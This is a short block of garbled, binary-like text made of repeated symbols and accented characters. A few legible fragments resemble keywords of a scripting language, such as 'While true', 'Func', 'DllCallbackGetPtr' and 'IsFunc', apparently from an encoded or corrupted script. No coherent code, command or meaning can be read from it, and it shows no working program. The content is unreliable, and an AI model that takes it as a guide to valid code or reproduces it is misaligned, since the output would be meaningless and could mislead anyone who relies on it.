+@o++++++++++++cal&
Lnñc8?&:1[9?+1G+++J+.60
:8+++++++++@++++++++++L¯cAl&
Iñc8?6[9?¸++++++++++++++++.6:8++?6:1[K?.6++l&
:8++++++al&++++++++++ca+++++++cal!
Lnñc8?&:1[9?+1G+++J+.60
:8+++++++++@++++++++++LmcAl&
Iñc8?6[9?¸++++++++++++++++.6:8++?6:1[K?.6++@++++++++++LmcAl&
Iñc8?6[9?¸++++++++.6:8++?6:1[K?.6:8+LocAl&
Iñ+++++++++++++++++++cal&
LoWhile trueñc8?&:1[9?+1+++++.6:8+++++Func+++@@?++1[9?3:1+++++++.6:8++?6DllCallbac-0)-kGetPtr:1[K?.7:(+Lo9?++++++.6:8+++++++++@+++++++++@@?++1([9?.6:8++++LocAl&

Loñc8?&:1[9?8ËÅÎ¤´À¿¿?++1[9?.6:8++++Lo++al&++++++++++ca+++++++cal&
Lnñc8?&:1[9?+1G+++J+®60
:8+++++++++@++++++++++LmcAl&
Iñc8?6[9?¸++++++++++++++++.6:8++?6Â1[K?.6++@++++++++++LmcAl&
Iñc8?6[9?¸++++++++++++++++.6:8++?6:1[K6:1[9?.6:8++l&
Lnñc8?&:1[9?+1G+++J+.60
:8+++++++++@++++++++++LmcAl&
Iñc8?6[9?+++++.6:8++?6:1[K?.6++@++++++++++LmcAl&
Iñc8?6[9?¸++++++++++++++++.6:8++?6:1[K?.6:8+LocAl&
Iñ+++++++++++++++++++cal&
Loñc8?&:1[9?+1+++++.6:8++++++++@IsFunc+++@@?++1[9?.6:8++++LofunccAl&
Iñc+++++++@D?+?6:1[K?.6:8+Lo9?+++++{+.6:8+++++++++@